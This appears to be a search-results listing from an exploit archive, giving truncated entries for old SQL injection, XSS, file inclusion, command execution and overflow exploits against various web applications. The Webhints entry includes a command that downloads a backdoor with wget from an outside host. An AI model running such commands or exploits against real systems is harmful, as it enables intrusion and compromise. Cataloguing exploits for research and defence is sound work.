2326 matches found
PlanetDNS PlanetFileServer - Remote Buffer Overflow (PoC)
PlanetDNS PlanetFileServer - Remote Buffer Overflow PoC source: https://www.securityfocus.com/bid/14138/info PlanetFileServer is prone to a remote buffer overflow vulnerability. A successful attack may allow an attacker to cause the server to crash or execute arbitrary code. This can lead to remo...
ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w SQL Injection Exploit for ASPNuke = 0.80 This exploit retrieve the username of the administrator of the board and his password crypted in SHA256 Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded Discovered and Coded ...
ASPNuke 0.80 - comment_post.asp SQL Injection
ASPNuke 0.80 - commentpost.asp SQL Injection !/usr/bin/perl -w SQL Injection Exploit for ASPNuke = 0.80 This exploit retrieve the username of the administrator of the board and his password crypted in SHA256 Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded Discovered...
CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. Forum Russian Board 4.2 is reported to be affected...
CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. Forum Russian Board 4.2 is reported to be affected...
Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor
!/usr/bin/perl Passwords Decrypter for UPB $optf" || die "- Unable to open $optf: $!"; print RESULTS "Results for $opth\n","="x40,"\n\n"; for$in=0;$in/ && print RESULTS "Username: $1\n"; $page$in=m/^$1.?/ && print R...
Bitrix Site Manager 4.0.5 - Remote File Inclusion
Bitrix Site Manager 4.0.5 - Remote File Inclusion + Author : Don Tukulesto [email protected] + Date : November 13, 2009 + Homepage : http://www.indonesiancoder.com + Vendor : http://www.bitrixsoft.com/ + Method : Remote File Inclusion + Location : INDONESIA Notes : I know this is an old...
Webhints 1.03 - Remote Command Execution (Perl) (1)
This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln Expl0it...
C.J. Steele Tattle - Remote Command Execution
source: https://www.securityfocus.com/bid/13883/info tattle is affected by a remote command execution vulnerability. An attacker can supply arbitrary commands prefixed with the '|' character as a value for the 'tld' variable that will be executed in the context of the application. An attacker can...
Rakkarsoft RakNet 2.33 - Remote Denial of Service
Rakkarsoft RakNet 2.33 - Remote Denial of Service source: https://www.securityfocus.com/bid/13862/info Rakkarsoft RakNet is affected by a remote denial of service vulnerability. Reportedly, the vulnerability presents itself when the library handles an empty UDP packet. RakNet 2.33 and prior...
BookReview 1.0 - search.htm?submit string Cross-Site Scripting
BookReview 1.0 - search.htm?submit string Cross-Site Scripting source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may...
MonoChat 1.0 - HTML Injection
MonoChat 1.0 - HTML Injection source: https://www.securityfocus.com/bid/17983/info MonoChat is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code...
Ultimate PHP Board 1.81.9 - viewforum.php Cross-Site Scripting
Ultimate PHP Board 1.81.9 - viewforum.php Cross-Site Scripting source: https://www.securityfocus.com/bid/13621/info Ultimate PHP Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may...
neteyes nexusway border gateway - Multiple Vulnerabilities
neteyes nexusway border gateway - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/13596/info NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an...
PHP-Nuke 0-7 - Double Hex Encoded Input Validation
PHP-Nuke 0-7 - Double Hex Encoded Input Validation source: https://www.securityfocus.com/bid/13557/info PHP Nuke is prone to an input validation vulnerability. Reports indicate the script fails to correctly identify potentially dangerous characters when the characters are double hex-encoded i.e...
FishCart 3.1 - 'display.php?psku' SQL Injection
source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit of the SQL-injection issues could allow an attacker to compromise...
Maxwebportal 1.3 - 'links_popular.asp' SQL Injection
source: https://www.securityfocus.com/bid/13466/info MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploitation could result in...
DUportal Pro 3.4 - inc_vote.asp Multiple SQL Injections
DUportal Pro 3.4 - incvote.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
DUportal Pro 3.4 - 'detail.asp' Multiple SQL Injections
source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application,...
MS Windows (HTA) Script Execution Exploit (MS05-016)
Exploit for unknown platform in category local exploits ==================================================== MS Windows HTA Script Execution Exploit MS05-016 ==================================================== / Changed date in db to place it on the main page instead of it being bumped off /str0...